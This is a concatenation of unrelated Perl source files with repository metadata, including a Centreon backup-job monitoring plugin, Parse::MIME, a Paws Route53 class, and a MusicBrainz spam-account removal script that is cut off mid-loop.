while($run) {
print STDOUT $loop++ . "\n";
my @buf;
my $samplecounter = $samples;
while(<>) {
chomp;
if(/exit/) {
$run = 0;
last;
}
push @buf, $_;
$samplecounter--;
if($samplecounter == 0) {
last;
}
}
print $pip "plot \"-\" notitle\n";
for my $elem (reverse @buf) {
print $pip ($elem)."\n";
}
print $pip "e\n";
}
print $pip "exit;\n";
close $pip;
}
main;
| 18.980198 | 85 | 0.53469 |
ed75e0b332c4ee67656144f40e554695a8da0b6b | 9,669 | pm | Perl | apps/backup/arcserve/udp/mssql/mode/jobstatus.pm | bert-jan/centreon-plugins | b4795f511fddf63402727750b45cc6c5ad69aad4 | [
"Apache-2.0"
] | null | null | null | apps/backup/arcserve/udp/mssql/mode/jobstatus.pm | bert-jan/centreon-plugins | b4795f511fddf63402727750b45cc6c5ad69aad4 | [
"Apache-2.0"
] | null | null | null | apps/backup/arcserve/udp/mssql/mode/jobstatus.pm | bert-jan/centreon-plugins | b4795f511fddf63402727750b45cc6c5ad69aad4 | [
"Apache-2.0"
] | null | null | null | #
# Copyright 2021 Centreon (http://www.centreon.com/)
#
# Centreon is a full-fledged industry-strength solution that meets
# the needs in IT infrastructure and application monitoring for
# service performance.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
package apps::backup::arcserve::udp::mssql::mode::jobstatus;
use base qw(centreon::plugins::templates::counter);
use strict;
use warnings;
sub custom_status_threshold {
my ($self, %options) = @_;
my $status = 'ok';
# To exclude some OK
if (defined($self->{instance_mode}->{option_results}->{ok_status}) && $self->{instance_mode}->{option_results}->{ok_status} ne '' &&
$self->eval(value => $self->{instance_mode}->{option_results}->{ok_status})) {
$status = 'ok';
} elsif (defined($self->{instance_mode}->{option_results}->{critical_status}) && $self->{instance_mode}->{option_results}->{critical_status} ne '' &&
$self->eval(value => $self->{instance_mode}->{option_results}->{critical_status})) {
$status = 'critical';
} elsif (defined($self->{instance_mode}->{option_results}->{warning_status}) && $self->{instance_mode}->{option_results}->{warning_status} ne '' &&
$self->eval(value => $self->{instance_mode}->{option_results}->{warning_status})) {
$status = 'warning';
}
return $status;
}
sub custom_status_output {
my ($self, %options) = @_;
return sprintf(
'status : %s (%s) [type: %s] [remote hostname: %s] [vmname: %s] [plan name: %s] [end time: %s]',
$self->{result_values}->{status} == 1 ? 'ok' : 'failed',
$self->{result_values}->{status},
$self->{result_values}->{type},
$self->{result_values}->{rhostname},
$self->{result_values}->{vmname},
$self->{result_values}->{plan_name},
scalar(localtime($self->{result_values}->{end_time}))
);
}
sub set_counters {
my ($self, %options) = @_;
$self->{maps_counters_type} = [
{ name => 'global', type => 0 },
{ name => 'job', type => 1, cb_prefix_output => 'prefix_job_output', message_multiple => 'All jobs are ok' },
];
$self->{maps_counters}->{global} = [
{ label => 'total', nlabel => 'jobs.total.count', set => {
key_values => [ { name => 'total' } ],
output_template => 'total jobs : %s',
perfdatas => [
{ label => 'total', value => 'total', template => '%s', min => 0 },
],
}
},
];
$self->{maps_counters}->{job} = [
{ label => 'status', threshold => 0, set => {
key_values => [
{ name => 'status' }, { name => 'display' },
{ name => 'type' }, { name => 'rhostname' }, { name => 'vmname' }, { name => 'plan_name' },
{ name => 'elapsed_time' }, { name => 'end_time' }
],
closure_custom_output => $self->can('custom_status_output'),
closure_custom_perfdata => sub { return 0; },
closure_custom_threshold_check => $self->can('custom_status_threshold')
}
},
];
}
sub new {
my ($class, %options) = @_;
my $self = $class->SUPER::new(package => __PACKAGE__, %options, force_new_perfdata => 1);
bless $self, $class;
$options{options}->add_options(arguments => {
'filter-server-name:s' => { name => 'filter_server_name' },
'filter-type:s' => { name => 'filter_type' },
'filter-start-time:s' => { name => 'filter_start_time' },
'filter-end-time:s' => { name => 'filter_end_time', default => 86400 },
'ok-status:s' => { name => 'ok_status', default => '%{status} == 1' },
'warning-status:s' => { name => 'warning_status', default => '' },
'critical-status:s' => { name => 'critical_status', default => '%{status} != 1' },
'timezone:s' => { name => 'timezone' }
});
return $self;
}
sub check_options {
my ($self, %options) = @_;
$self->SUPER::check_options(%options);
$self->change_macros(macros => [
'ok_status', 'warning_status', 'critical_status'
]
);
if (defined($self->{option_results}->{timezone}) && $self->{option_results}->{timezone} ne '') {
$ENV{TZ} = $self->{option_results}->{timezone};
}
}
sub prefix_job_output {
my ($self, %options) = @_;
return "job '" . $options{instance_value}->{display} . "' ";
}
sub manage_selection {
my ($self, %options) = @_;
my $query = q{
SELECT
lj.jobId,
lj.jobStatus,
rhostname,
vmname,
DATEDIFF(s, '1970-01-01 00:00:00', lj.jobLocalStartTime) as start_time,
DATEDIFF(s, '1970-01-01 00:00:00', lj.jobLocalEndTime) as end_time,
ep.name,
lj.jobType,
lj.jobStatus
FROM as_edge_d2dJobHistory_lastJob lj LEFT OUTER JOIN as_edge_policy ep ON lj.planUUID = ep.uuid
LEFT JOIN as_edge_host h on lj.agentId = h.rhostid
LEFT JOIN as_edge_vsphere_entity_host_map entityHostMap ON h.rhostid = entityHostMap.hostId
LEFT JOIN as_edge_vsphere_vm_detail vmDetail ON entityHostMap.entityId=vmDetail.entityId
};
$options{sql}->connect();
$options{sql}->query(query => $query);
$self->{global} = { total => 0 };
$self->{job} = {};
my ($count, $current_time) = (0, time());
while ((my $row = $options{sql}->fetchrow_hashref())) {
my $rhostname = defined($row->{rhostname}) && $row->{rhostname} ne '' ? $row->{rhostname} : 'unknown';
my $vmname = defined($row->{vmname}) && $row->{vmname} ne '' ? $row->{vmname} : '-';
my $plan_name = defined($row->{name}) && $row->{name} ne '' ? $row->{name} : 'unknown';
if (defined($self->{option_results}->{filter_type}) && $self->{option_results}->{filter_type} ne '' &&
$row->{jobType} !~ /$self->{option_results}->{filter_type}/) {
$self->{output}->output_add(long_msg => "skipping job '" . $row->{jobId} . "': no matching filter type.", debug => 1);
next;
}
if (defined($self->{option_results}->{filter_end_time}) && $self->{option_results}->{filter_end_time} =~ /[0-9]+/ &&
defined($row->{end_time}) && $row->{end_time} =~ /[0-9]+/ && $row->{end_time} < ($current_time - $self->{option_results}->{filter_end_time})) {
$self->{output}->output_add(long_msg => "skipping job '" . $row->{jobId} . "': end time too old.", debug => 1);
next;
}
if (defined($self->{option_results}->{filter_start_time}) && $self->{option_results}->{filter_start_time} =~ /[0-9]+/ &&
defined($row->{start_time}) && $row->{start_time} =~ /[0-9]+/ && $row->{start_time} < ($current_time - $self->{option_results}->{filter_start_time})) {
$self->{output}->output_add(long_msg => "skipping job '" . $row->{jobId} . "': start time too old.", debug => 1);
next;
}
if (defined($self->{option_results}->{filter_server_name}) && $self->{option_results}->{filter_server_name} ne '' &&
($row->{rhostname} !~ /$self->{option_results}->{filter_server_name}/ && $vmname !~ /$self->{option_results}->{filter_server_name}/)) {
$self->{output}->output_add(long_msg => "skipping job '" . $row->{jobId} . "': no matching filter type.", debug => 1);
next;
}
my $elapsed_time = defined($row->{start_time}) ? $current_time - $row->{start_time} : -1;
$self->{job}->{$row->{jobId}} = {
display => $row->{jobId},
elapsed_time => $elapsed_time,
status => $row->{jobStatus},
type => $row->{jobType},
rhostname => $rhostname,
vmname => $vmname,
plan_name => $plan_name,
end_time => $row->{end_time},
};
$self->{global}->{total}++;
}
}
1;
__END__
=head1 MODE
Check job status.
=over 8
=item B<--filter-server-name>
Filter job server name (can be a regexp).
=item B<--filter-type>
Filter job type (can be a regexp).
=item B<--filter-start-time>
Filter job with start time greater than current time less value in seconds.
=item B<--filter-end-time>
Filter job with end time greater than current time less value in seconds (Default: 86400).
=item B<--timezone>
Timezone of mssql server (If not set, we use current server execution timezone).
=item B<--ok-status>
Set ok threshold for status (Default: '%{status} == 1')
Can use special variables like: %{display}, %{status}
=item B<--warning-status>
Set warning threshold for status (Default: '').
Can use special variables like: %{display}, %{status}, %{type}
=item B<--critical-status>
Set critical threshold for status (Default: '%{status} != 1').
Can use special variables like: %{display}, %{status}, %{type}
=item B<--warning-total>
Set warning threshold for total jobs.
=item B<--critical-total>
Set critical threshold for total jobs.
=back
=cut
| 37.622568 | 163 | 0.573999 |
ed6ce8fdad2fa6930a6a5bea4b8228a2ba6d63ee | 4,573 | pm | Perl | lib/EzmaxApi/Object/FieldEEzsignformfieldgroupType.pm | ezmaxinc/eZmax-SDK-perl | 3de20235136371b946247d2aed9e5e5704a4051c | [
"MIT"
] | null | null | null | lib/EzmaxApi/Object/FieldEEzsignformfieldgroupType.pm | ezmaxinc/eZmax-SDK-perl | 3de20235136371b946247d2aed9e5e5704a4051c | [
"MIT"
] | null | null | null | lib/EzmaxApi/Object/FieldEEzsignformfieldgroupType.pm | ezmaxinc/eZmax-SDK-perl | 3de20235136371b946247d2aed9e5e5704a4051c | [
"MIT"
] | null | null | null | =begin comment
eZmax API Definition (Full)
This API expose all the functionnalities for the eZmax and eZsign applications.
The version of the OpenAPI document: 1.1.7
Contact: support-api@ezmax.ca
Generated by: https://openapi-generator.tech
=end comment
=cut
#
# NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
# Do not edit the class manually.
# Ref: https://openapi-generator.tech
#
package EzmaxApi::Object::FieldEEzsignformfieldgroupType;
require 5.6.0;
use strict;
use warnings;
use utf8;
use JSON qw(decode_json);
use Data::Dumper;
use Module::Runtime qw(use_module);
use Log::Any qw($log);
use Date::Parse;
use DateTime;
use base ("Class::Accessor", "Class::Data::Inheritable");
#
#The Type of Ezsignformfieldgroup
#
# NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech). Do not edit the class manually.
# REF: https://openapi-generator.tech
#
=begin comment
eZmax API Definition (Full)
This API expose all the functionnalities for the eZmax and eZsign applications.
The version of the OpenAPI document: 1.1.7
Contact: support-api@ezmax.ca
Generated by: https://openapi-generator.tech
=end comment
=cut
#
# NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
# Do not edit the class manually.
# Ref: https://openapi-generator.tech
#
__PACKAGE__->mk_classdata('attribute_map' => {});
__PACKAGE__->mk_classdata('openapi_types' => {});
__PACKAGE__->mk_classdata('method_documentation' => {});
__PACKAGE__->mk_classdata('class_documentation' => {});
# new plain object
sub new {
my ($class, %args) = @_;
my $self = bless {}, $class;
$self->init(%args);
return $self;
}
# initialize the object
sub init
{
my ($self, %args) = @_;
foreach my $attribute (keys %{$self->attribute_map}) {
my $args_key = $self->attribute_map->{$attribute};
$self->$attribute( $args{ $args_key } );
}
}
# return perl hash
sub to_hash {
my $self = shift;
my $_hash = decode_json(JSON->new->convert_blessed->encode($self));
return $_hash;
}
# used by JSON for serialization
sub TO_JSON {
my $self = shift;
my $_data = {};
foreach my $_key (keys %{$self->attribute_map}) {
if (defined $self->{$_key}) {
$_data->{$self->attribute_map->{$_key}} = $self->{$_key};
}
}
return $_data;
}
# from Perl hashref
sub from_hash {
my ($self, $hash) = @_;
# loop through attributes and use openapi_types to deserialize the data
while ( my ($_key, $_type) = each %{$self->openapi_types} ) {
my $_json_attribute = $self->attribute_map->{$_key};
if ($_type =~ /^array\[(.+)\]$/i) { # array
my $_subclass = $1;
my @_array = ();
foreach my $_element (@{$hash->{$_json_attribute}}) {
push @_array, $self->_deserialize($_subclass, $_element);
}
$self->{$_key} = \@_array;
} elsif ($_type =~ /^hash\[string,(.+)\]$/i) { # hash
my $_subclass = $1;
my %_hash = ();
while (my($_key, $_element) = each %{$hash->{$_json_attribute}}) {
$_hash{$_key} = $self->_deserialize($_subclass, $_element);
}
$self->{$_key} = \%_hash;
} elsif (exists $hash->{$_json_attribute}) { #hash(model), primitive, datetime
$self->{$_key} = $self->_deserialize($_type, $hash->{$_json_attribute});
} else {
$log->debugf("Warning: %s (%s) does not exist in input hash\n", $_key, $_json_attribute);
}
}
return $self;
}
# deserialize non-array data
sub _deserialize {
my ($self, $type, $data) = @_;
$log->debugf("deserializing %s with %s",Dumper($data), $type);
if ($type eq 'DateTime') {
return DateTime->from_epoch(epoch => str2time($data));
} elsif ( grep( /^$type$/, ('int', 'double', 'string', 'boolean'))) {
return $data;
} else { # hash(model)
my $_instance = eval "EzmaxApi::Object::$type->new()";
return $_instance->from_hash($data);
}
}
__PACKAGE__->class_documentation({description => 'The Type of Ezsignformfieldgroup',
class => 'FieldEEzsignformfieldgroupType',
required => [], # TODO
} );
__PACKAGE__->method_documentation({
});
__PACKAGE__->openapi_types( {
} );
__PACKAGE__->attribute_map( {
} );
__PACKAGE__->mk_accessors(keys %{__PACKAGE__->attribute_map});
1;
| 25.836158 | 123 | 0.611634 |
eda83f8183a9bed46b5e89c117e7b977398d25ce | 1,772 | pm | Perl | auto-lib/Paws/Route53/ListHealthChecksResponse.pm | 0leksii/aws-sdk-perl | b2132fe3c79a06fd15b6137e8a0eb628de722e0f | [
"Apache-2.0"
] | 164 | 2015-01-08T14:58:53.000Z | 2022-02-20T19:16:24.000Z | auto-lib/Paws/Route53/ListHealthChecksResponse.pm | 0leksii/aws-sdk-perl | b2132fe3c79a06fd15b6137e8a0eb628de722e0f | [
"Apache-2.0"
] | 348 | 2015-01-07T22:08:38.000Z | 2022-01-27T14:34:44.000Z | auto-lib/Paws/Route53/ListHealthChecksResponse.pm | 0leksii/aws-sdk-perl | b2132fe3c79a06fd15b6137e8a0eb628de722e0f | [
"Apache-2.0"
] | 87 | 2015-04-22T06:29:47.000Z | 2021-09-29T14:45:55.000Z |
package Paws::Route53::ListHealthChecksResponse;
use Moose;
has HealthChecks => (is => 'ro', isa => 'ArrayRef[Paws::Route53::HealthCheck]', request_name => 'HealthCheck', traits => ['NameInRequest'], required => 1);
has IsTruncated => (is => 'ro', isa => 'Bool', required => 1);
has Marker => (is => 'ro', isa => 'Str', required => 1);
has MaxItems => (is => 'ro', isa => 'Str', required => 1);
has NextMarker => (is => 'ro', isa => 'Str');
has _request_id => (is => 'ro', isa => 'Str');
1;
### main pod documentation begin ###
=head1 NAME
Paws::Route53::ListHealthChecksResponse
=head1 ATTRIBUTES
=head2 B<REQUIRED> HealthChecks => ArrayRef[L<Paws::Route53::HealthCheck>]
A complex type that contains one C<HealthCheck> element for each health
check that is associated with the current AWS account.
=head2 B<REQUIRED> IsTruncated => Bool
A flag that indicates whether there are more health checks to be
listed. If the response was truncated, you can get the next group of
health checks by submitting another C<ListHealthChecks> request and
specifying the value of C<NextMarker> in the C<marker> parameter.
=head2 B<REQUIRED> Marker => Str
For the second and subsequent calls to C<ListHealthChecks>, C<Marker>
is the value that you specified for the C<marker> parameter in the
previous request.
=head2 B<REQUIRED> MaxItems => Str
The value that you specified for the C<maxitems> parameter in the call
to C<ListHealthChecks> that produced the current response.
=head2 NextMarker => Str
If C<IsTruncated> is C<true>, the value of C<NextMarker> identifies the
first health check that Amazon Route 53 returns if you submit another
C<ListHealthChecks> request and specify the value of C<NextMarker> in
the C<marker> parameter.
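
For example, a caller could page through all health checks roughly like
this (a sketch only; it assumes a C<Paws> Route 53 client whose
C<ListHealthChecks> call accepts C<Marker> and C<MaxItems> and returns
this response class):

  my $route53 = Paws->service('Route53');
  my $result  = $route53->ListHealthChecks(MaxItems => '100');
  my @checks  = @{ $result->HealthChecks };
  while ($result->IsTruncated) {
      $result = $route53->ListHealthChecks(
          Marker   => $result->NextMarker,
          MaxItems => '100',
      );
      push @checks, @{ $result->HealthChecks };
  }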
=cut
| 26.848485 | 157 | 0.717833 |
eda538fdf4a509d7ca881b7820d27bd303025be6 | 6,883 | pm | Perl | lib/Parse/MIME.pm | gitpan/Parse-MIME | 2195007335ea9a07e919e9766cb91766a2b3808b | [
"Artistic-1.0"
] | null | null | null | lib/Parse/MIME.pm | gitpan/Parse-MIME | 2195007335ea9a07e919e9766cb91766a2b3808b | [
"Artistic-1.0"
] | null | null | null | lib/Parse/MIME.pm | gitpan/Parse-MIME | 2195007335ea9a07e919e9766cb91766a2b3808b | [
"Artistic-1.0"
] | null | null | null | use 5.006;
use strict;
use warnings;
package Parse::MIME;
$Parse::MIME::VERSION = '1.002';
# ABSTRACT: Parse mime-types, match against media ranges
use Exporter 'import';
our @EXPORT_OK = qw(
&parse_mime_type &parse_media_range &parse_media_range_list
&fitness_and_quality_parsed &quality_parsed &quality
&best_match
);
our %EXPORT_TAGS = ( all => \@EXPORT_OK );
sub _numify($) { no warnings 'numeric'; 0 + shift }
# takes any number of args and returns copies stripped of surrounding whitespace
sub _strip { s/\A +//, s/ +\z// for my @s = @_; @s[ 0 .. $#s ] }
# check whether first two args are equal or one of them is a wildcard
sub _match { $_[0] eq $_[1] or grep { $_ eq '*' } @_[0,1] }
sub parse_mime_type {
my ( $mime_type ) = @_;
my @part = split /;/, $mime_type;
my $full_type = _strip shift @part;
my %param = map { _strip split /=/, $_, 2 } @part;
# Java URLConnection class sends an Accept header that includes a single "*"
# Turn it into a legal wildcard.
$full_type = '*/*' if $full_type eq '*';
my ( $type, $subtype ) = _strip split m!/!, $full_type;
return ( $type, $subtype, \%param );
}
sub parse_media_range {
my ( $range ) = @_;
my ( $type, $subtype, $param ) = parse_mime_type $range;
$param->{'q'} = 1
unless defined $param->{'q'}
and length $param->{'q'}
and _numify $param->{'q'} <= 1
and _numify $param->{'q'} >= 0;
return ( $type, $subtype, $param );
}
sub parse_media_range_list {
my ( $media_range_list ) = @_;
return map { parse_media_range $_ } split /,/, $media_range_list;
}
sub fitness_and_quality_parsed {
my ( $mime_type, @parsed_ranges ) = @_;
my ( $best_fitness, $best_fit_q ) = ( -1, 0 );
my ( $target_type, $target_subtype, $target_param )
= parse_media_range $mime_type;
while ( my ( $type, $subtype, $param ) = splice @parsed_ranges, 0, 3 ) {
if ( _match( $type, $target_type ) and _match( $subtype, $target_subtype ) ) {
my $fitness
= ( $type eq $target_type ? 100 : 0 )
+ ( $subtype eq $target_subtype ? 10 : 0 )
;
while ( my ( $k, $v ) = each %$param ) {
++$fitness
if $k ne 'q'
and exists $target_param->{ $k }
and $target_param->{ $k } eq $v;
}
( $best_fitness, $best_fit_q ) = ( $fitness, $param->{'q'} )
if $fitness > $best_fitness;
}
}
return ( $best_fitness, _numify $best_fit_q );
}
sub quality_parsed {
return +( fitness_and_quality_parsed @_ )[1];
}
sub quality {
my ( $mime_type, $ranges ) = @_;
my @parsed_range = parse_media_range_list $ranges;
return quality_parsed $mime_type, @parsed_range;
}
sub best_match {
my ( $supported, $header ) = @_;
my @parsed_header = parse_media_range_list $header;
# fitness_and_quality_parsed will return fitness -1 on failure,
# so we want to start with an invalid value greater than that
my ( $best_fitness, $best_fit_q, $match ) = ( -.5, 0 );
for my $type ( @$supported ) {
my ( $fitness, $fit_q ) = fitness_and_quality_parsed $type, @parsed_header;
next if $fitness < $best_fitness;
next if $fitness == $best_fitness and $fit_q < $best_fit_q;
( $best_fitness, $best_fit_q, $match ) = ( $fitness, $fit_q, $type );
}
return if not defined $match;
return $match;
}
__END__
=pod
=encoding UTF-8
=head1 NAME
Parse::MIME - Parse mime-types, match against media ranges
=head1 VERSION
version 1.002
=head1 SYNOPSIS
use Parse::MIME qw( best_match );
print best_match( [ qw( application/xbel+xml text/xml ) ], 'text/*;q=0.5,*/*; q=0.1' );
# text/xml
=head1 DESCRIPTION
This module provides basic functions for handling mime-types. It can handle matching mime-types against a list of media-ranges. See section 14.1 of the HTTP specification [RFC 2616] for a complete explanation: L<http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.1>
=head1 INTERFACE
None of the following functions are exported by default. You can use the C<:all> tag to import all of them into your package:
use Parse::MIME ':all';
=head2 parse_mime_type
Parses a mime-type into its component parts and returns type, subtype and params, where params is a reference to a hash of all the parameters for the media range:
parse_mime_type 'application/xhtml;q=0.5'
# ( 'application', 'xhtml', { q => 0.5 } )
=head2 parse_media_range
Media-ranges are mime-types with wild-cards and a C<q> quality parameter. This function works just like L</parse_mime_type>, but also guarantees that there is a value for C<q> in the params hash, supplying the default value if necessary.
parse_media_range 'application/xhtml'
# ( 'application', 'xhtml', { q => 1 } )
=head2 parse_media_range_list
Media-range lists are comma-separated lists of media ranges. This function works just like L</parse_media_range>, but accepts a comma-separated list of media ranges and returns the parsed components for all of the media-ranges in the list.
my @l = parse_media_range_list 'application/xhtml, text/html;q=0.7'
# ( 'application', 'xhtml', { q => 1 }, 'text', 'html', { q => 0.7 } )
=head2 fitness_and_quality_parsed
Find the best match for a given mime-type (passed as the first parameter) against a list of media ranges that have already been parsed by L</parse_media_range> (passed as a flat list). Returns the fitness value and the value of the C<q> quality parameter of the best match, or C<( -1, 0 )> if no match was found.
# for @l see above
fitness_and_quality_parsed( 'text/html', @l )
# ( 110, 0.7 )
=head2 quality
Determines the quality (C<q>) of a mime-type (passed as the first parameter) when compared against a media-range list string. F.ex.:
quality( 'text/html', 'text/*;q=0.3, text/html;q=0.7, text/html;level=1, text/html;level=2;q=0.4, */*;q=0.5' )
# 0.7
=head2 quality_parsed
Just like L</quality>, except the second parameter must be pre-parsed by L</parse_media_range_list>.
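
F.ex. this is equivalent to the L</quality> example above, with the
media-range list pre-parsed by L</parse_media_range_list>:

 quality_parsed( 'text/html', parse_media_range_list( 'text/*;q=0.3, text/html;q=0.7, text/html;level=1, text/html;level=2;q=0.4, */*;q=0.5' ) )
 # 0.7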
=head2 best_match
Choose the mime-type with the highest quality (C<q>) from a list of candidates. Takes an array of supported mime-types as the first parameter and finds the best match for all the media-ranges listed in header, which is passed as the second parameter. The value of header must be a string that conforms to the format of the HTTP C<Accept> header. F.ex.:
best_match( [ qw( application/xbel+xml text/xml ) ], 'text/*;q=0.5,*/*; q=0.1' )
# 'text/xml'
=head1 AUTHOR
=over 4
=item * Joe Gregorio L<mailto:joe@bitworking.org>
Original Python code
=item * Aristotle Pagaltzis L<mailto:pagaltzis@gmx.de>
Perl port
=back
=head1 COPYRIGHT AND LICENCE
Documentation: Copyright (c) 2008, Joe Gregorio. All rights reserved.
Perl code: Copyright (c) 2008, Aristotle Pagaltzis. All rights reserved.
=head1 AUTHOR
Aristotle Pagaltzis <pagaltzis@gmx.de>
=head1 COPYRIGHT AND LICENSE
This software is copyright (c) 2015 by Aristotle Pagaltzis.
This is free software; you can redistribute it and/or modify it under
the same terms as the Perl 5 programming language system itself.
=cut
| 29.926087 | 352 | 0.692576 |
edada6e14ef7fa7b13977eb3d5e73e1190fbaea8 | 393 | pm | Perl | lib/DDG/Spice/CveSummary.pm | imwally/zeroclickinfo-spice | 1ce4991c95b384fe21b1d2acf86b58497a4ff50e | [
"Apache-2.0"
] | 1 | 2017-03-14T04:27:47.000Z | 2017-03-14T04:27:47.000Z | lib/DDG/Spice/CveSummary.pm | imwally/zeroclickinfo-spice | 1ce4991c95b384fe21b1d2acf86b58497a4ff50e | [
"Apache-2.0"
] | null | null | null | lib/DDG/Spice/CveSummary.pm | imwally/zeroclickinfo-spice | 1ce4991c95b384fe21b1d2acf86b58497a4ff50e | [
"Apache-2.0"
] | null | null | null | package DDG::Spice::CveSummary;
# Displays a summary for a CVE.
#
use DDG::Spice;
spice is_cached => 1;
spice to => 'https://cve.circl.lu/api/cve/$1';
spice wrap_jsonp_callback => 1;
triggers start => "cve";
handle query_lc => sub {
return unless $_ =~ qr/^cve-\d{4}-\d{4}/s; # match specific CVE pattern
return unless $_; # Guard against "no answer"
return uc $_;
};
1;
| 18.714286 | 75 | 0.636132 |
ed7df80f8efd00ea2bd1b04d5d8a3a29febac857 | 853 | pm | Perl | Source/Manip/Offset/off025.pm | ssp/Pester | f2d8ec2f62bfb83656f77f3ee41b54149287904a | [
"BSD-2-Clause"
] | 59 | 2015-01-11T18:44:25.000Z | 2022-03-07T22:56:02.000Z | Source/Manip/Offset/off025.pm | ssp/Pester | f2d8ec2f62bfb83656f77f3ee41b54149287904a | [
"BSD-2-Clause"
] | 11 | 2015-06-19T11:01:00.000Z | 2018-06-05T21:30:17.000Z | Source/Manip/Offset/off025.pm | ssp/Pester | f2d8ec2f62bfb83656f77f3ee41b54149287904a | [
"BSD-2-Clause"
] | 7 | 2015-09-21T21:04:59.000Z | 2022-02-13T18:26:47.000Z | package #
Date::Manip::Offset::off025;
# Copyright (c) 2008-2014 Sullivan Beck. All rights reserved.
# This program is free software; you can redistribute it and/or modify it
# under the same terms as Perl itself.
# This file was automatically generated. Any changes to this file will
# be lost the next time 'tzdata' is run.
# Generated on: Fri Nov 21 11:03:44 EST 2014
# Data version: tzdata2014j
# Code version: tzcode2014j
# This module contains data from the zoneinfo time zone database. The original
# data was obtained from the URL:
# ftp://ftp.iana.org/tz
use strict;
use warnings;
require 5.010000;
our ($VERSION);
$VERSION='6.48';
END { undef $VERSION; }
our ($Offset,%Offset);
END {
undef $Offset;
undef %Offset;
}
$Offset = '+01:08:24';
%Offset = (
0 => [
'africa/windhoek',
],
);
1;
| 21.325 | 79 | 0.66823 |
ed0f334c05979f7e0c60b93ed4800b457d786363 | 5,208 | pl | Perl | admin/RemoveSpamAccounts.pl | qls0ulp/musicbrainz-server | ebe8a45bf6f336352cd5c56e2e825d07679c0e45 | [
"BSD-2-Clause"
] | 577 | 2015-01-15T12:18:50.000Z | 2022-03-16T20:41:57.000Z | admin/RemoveSpamAccounts.pl | qls0ulp/musicbrainz-server | ebe8a45bf6f336352cd5c56e2e825d07679c0e45 | [
"BSD-2-Clause"
] | 1,227 | 2015-04-16T01:00:29.000Z | 2022-03-30T15:08:46.000Z | admin/RemoveSpamAccounts.pl | qls0ulp/musicbrainz-server | ebe8a45bf6f336352cd5c56e2e825d07679c0e45 | [
"BSD-2-Clause"
] | 280 | 2015-01-04T08:39:41.000Z | 2022-03-10T17:09:59.000Z | #!/usr/bin/env perl
use warnings;
#____________________________________________________________________________
#
# MusicBrainz -- the open internet music database
#
# Copyright (C) 2011-2017 MetaBrainz Foundation
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
# $Id$
#____________________________________________________________________________
use strict;
use FindBin;
use lib "$FindBin::Bin/../lib";
use open ':std', ':encoding(UTF-8)';
use Getopt::Long;
use Log::Dispatch;
use MusicBrainz::Server::Context;
my $verbose = 0;
my $case_insensitive = 0;
my $force = 0;
my $dry_run = 0;
my $pattern = undef;
my $column = undef;
GetOptions(
"column|c=s" => \$column,
"pattern|p=s" => \$pattern,
"dry-run|d" => \$dry_run,
"force|f" => \$force,
"ignore-case|i" => \$case_insensitive,
"verbose|v" => \$verbose,
) or usage();
my %allowed_columns = (
'name' => 1,
'email' => 1,
'website' => 1,
'bio' => 1,
);
sub usage {
warn <<EOF;
Usage: $0 <filter> [options]
FILTERS
-c --column COLUMN Specify the column used to filter accounts
-p --pattern PATTERN Specify the pattern matching column values
Allowed columns
name
email
website
bio
Patterns are case sensitive POSIX regular expressions, see
https://www.postgresql.org/docs/current/static/functions-matching.html#FUNCTIONS-POSIX-REGEXP
OPTIONS
-d, --dry-run Perform a trial run without removing any account
-f, --force Remove accounts even if they have edits/votes/OAuth tokens
-i, --ignore-case Consider patterns as case insensitive POSIX regular expressions
-v, --verbose Print filtered column additionally to id and name
EXAMPLES
$0 --column name --dry-run --pattern '^yvanzo\$'
Perform a trial run of removing account of script author
$0 --column email --dry-run --pattern '\@metabrainz.org\$'
Perform a trial run of removing accounts of MetaBrainz team
$0 --column website --dry-run --pattern '\\<gracenote\\.com\\>'
Perform a trial run of removing every account linked to Gracenote
$0 --column bio --dry-run --pattern 'unicorn' --ignore-case
Perform a trial run of removing every account which dared to mention unicorn in its bio
EOF
exit(2);
};
if (!defined $column || $column eq '') {
warn "No filtered column given, you dolt. Refusing to do anything.\n";
usage();
}
if (!exists($allowed_columns{$column})) {
warn "Given filtered column is not allowed, you dolt. Refusing to do anything.\n";
usage();
}
if (!defined $pattern || $pattern eq '') {
warn "No matching pattern given, you dolt. Refusing to do anything.\n";
usage();
}
my $c = MusicBrainz::Server::Context->create_script_context();
my $sql = Sql->new($c->conn);
my $dbh = $c->dbh;
my $regexp_operator = $case_insensitive ? '~*' : '~';
my $editors = $c->sql->select_list_of_hashes("SELECT id, name, $column FROM editor WHERE $column $regexp_operator ?", $pattern);
foreach my $ed (@{$editors}) {
my $details = $dbh->quote($ed->{name});
if ($verbose && $column ne 'name') {
$details .= " [${column}=" . $dbh->quote($ed->{$column}) . "]";
}
my $id = $ed->{id};
if (!$force) {
my $edit_count = $c->sql->select_single_value("SELECT count(*) FROM edit WHERE editor = ?", $id);
if ($edit_count > 0) {
print "Not removing account " . $details . " because it has edits.\n";
next;
}
my $vote_count = $c->sql->select_single_value("SELECT count(*) FROM vote WHERE editor = ?", $id);
if ($vote_count > 0) {
print "Not removing account " . $details . " because it has votes.\n";
next;
}
my $oauth_token_count = $c->sql->select_single_value("SELECT count(*) FROM editor_oauth_token WHERE editor = ?", $id);
if ($oauth_token_count > 0) {
print "Not removing account " . $details . " because it has OAuth tokens.\n";
next;
}
}
if ($dry_run) {
print "removing account " . $details . " (dry run)\n";
}
else
{
print "removing account " . $details . "\n";
eval {
$c->model('Editor')->delete($id);
$sql->begin;
$sql->do("DELETE FROM edit_note WHERE editor = ?", $id);
$sql->do("DELETE FROM editor WHERE id = ?", $id);
$sql->commit;
};
if ($@) {
warn "Remove editor $id died with $@\n";
